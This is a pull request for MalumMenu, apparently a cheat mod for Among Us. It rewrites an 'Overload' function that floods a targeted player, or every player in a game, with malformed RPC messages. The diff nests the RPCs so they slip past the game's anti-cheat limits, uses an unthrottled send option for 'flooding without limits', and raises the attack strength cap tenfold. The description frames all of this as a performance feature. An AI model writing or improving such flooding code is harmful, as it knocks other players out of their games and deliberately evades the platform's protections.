### PR TITLE
Use nested RPCs for Overload

### DIFF
--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -122,10 +122,10 @@ public partial class MalumMenu : BasePlugin
 
         adaptMaxStrength = Config.Bind("MalumMenu.Overload",
                                 "AdaptMaxStrength",
-                                500,
+                                5000,
                                 new ConfigDescription(
                                     "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 1000)
+                                    new AcceptableValueRange<int>(1, 10000)
                                 ));
 
         adaptMaxCooldown = Config.Bind("MalumMenu.Overload",
@@ -143,10 +143,10 @@ public partial class MalumMenu : BasePlugin
 
         defaultStrength = Config.Bind("MalumMenu.Overload",
                                 "DefaultStrength",
-                                500,
+                                5000,
                                 new ConfigDescription(
                                     "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 1000)
+                                    new AcceptableValueRange<int>(1, 10000)
                                 ));
 
         defaultCooldown = Config.Bind("MalumMenu.Overload",

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -204,7 +204,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(50f));
+        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 
@@ -224,7 +224,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(50f));
+        bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -8,7 +8,7 @@ public class OverloadTab : ITab
     public string name => "Overload";
 
     private GUIStyle _sliderSubtitle;
-    private int _maxStrength = 1000;
+    private int _maxStrength = 10000;
     private float _maxCooldown = 1f;
     private float _fpsEstimate = 0f;
     private float _rawCooldown;
@@ -253,11 +253,11 @@ public class OverloadTab : ITab
 
         if (isPressedMaxStrength)
         {
-            if (_maxStrength >= 1000) // Max _maxStrength = 1000 RPCs
+            if (_maxStrength >= 10000) // Max _maxStrength = 10000 RPCs
             {
                 CheatToggles.olAutoAdapt = false; // Disable AutoAdapt if user does manual input
 
-                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/10f); // Adjust value to account for max change (÷10)
+                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/100f); // Adjust value to account for max change (÷10)
 
                 _maxStrength = 100; // Min _maxStrength = 100 RPCs
             }

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -261,6 +261,8 @@ public static class Utils
         }
     }
 
+    // Returns the max number of nested RPCs that can be in a GameData message
+    // without getting kicked by AC
     public static int GetMaxRpcPackingLimit()
     {
         int num = 0;

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -264,6 +264,12 @@ public static class Utils
     // Overloads target with set strength using malformed RPCs
     public static void Overload(int targetId, int strength)
     {
+        if (strength < 1) return;
+
+        // Host = max 40 / Client = max 10 nested RPCs in a single GameData msg (allowed by AC)
+
+        int maxRpc = AmongUsClient.Instance.AmHost ? 40 : 10;
+
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby
 
@@ -272,10 +278,49 @@ public static class Utils
         uint netId = hasLadders ? PlayerControl.LocalPlayer.NetId : PlayerControl.LocalPlayer.MyPhysics.NetId;
         byte rpcCall = hasLadders ? (byte)RpcCalls.SetStartCounter : (byte)RpcCalls.ClimbLadder;
 
-        for (int i = 0; i < strength; i++) // Strength = Num of malformed RPCs sent
+        if (strength <= maxRpc)
         {
-            MessageWriter overloadMsg = AmongUsClient.Instance.StartRpcImmediately(netId, rpcCall, SendOption.None, targetId);
-            AmongUsClient.Instance.FinishRpcImmediately(overloadMsg);
+            // SendOption.None has no flow control, allowing for flooding without limits
+
+            var messageWriter = MessageWriter.Get(SendOption.None);
+
+            if (targetId < 0) // -1 = Broadcast
+            {
+                messageWriter.StartMessage(Tags.GameData);
+                messageWriter.Write(AmongUsClient.Instance.GameId);
+            }
+            else
+            {
+                messageWriter.StartMessage(Tags.GameDataTo);
+                messageWriter.Write(AmongUsClient.Instance.GameId);
+                messageWriter.WritePacked(targetId);
+            }
+
+            for (var msg = 0; msg < strength; msg++)
+            {
+                messageWriter.StartMessage((byte)GameDataTypes.RpcFlag);
+                messageWriter.WritePacked(netId);
+                messageWriter.Write(rpcCall);
+                messageWriter.EndMessage();
+            }
+
+            messageWriter.EndMessage();
+
+            AmongUsClient.Instance.connection.Send(messageWriter);
+
+            messageWriter.Recycle();
+        }
+        else
+        {
+            int strengthGroups = strength / maxRpc;
+            int remainder = strength % maxRpc;
+
+            for (int group = 0; group < strengthGroups; group++)
+            {
+                Overload(targetId, maxRpc);
+            }
+
+            Overload(targetId, remainder);
         }
     }
 

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -261,12 +261,24 @@ public static class Utils
         }
     }
 
+    public static int GetMaxRpcPackingLimit()
+    {
+        int num = 0;
+
+        if (isClient && AmongUsClient.Instance.AmHost)
+        {
+            num = GameManager.Instance.LogicOptions.MaxPlayers * 2;
+        }
+
+        return 10 + num;
+    }
+
     // Overloads target with set strength using malformed RPCs
     public static void Overload(int targetId, int strength)
     {
         if (strength < 1) return;
 
-        int maxRpc = AmongUsClient.Instance.GetMaxMessagePackingLimit();
+        int maxRpc = GetMaxRpcPackingLimit();
 
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -266,9 +266,7 @@ public static class Utils
     {
         if (strength < 1) return;
 
-        // Host = max 40 / Client = max 10 nested RPCs in a single GameData msg (allowed by AC)
-
-        int maxRpc = AmongUsClient.Instance.AmHost ? 40 : 10;
+        int maxRpc = AmongUsClient.Instance.GetMaxMessagePackingLimit();
 
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby


### PR DESCRIPTION
- **Perf**: Use nested RPCs for the Overload util
  - This allows for 10x the strength output (at minimum) without causing higher lag or disconnecting users
  - Strength output is even more efficient if hosting, as the limit on nested RPCs is higher for hosts (depending on max player count)
- **Feat**: Increase max strength cap from 1K to 10K to account for performance boost
  - Also increase all default strength values (500 -> 5K)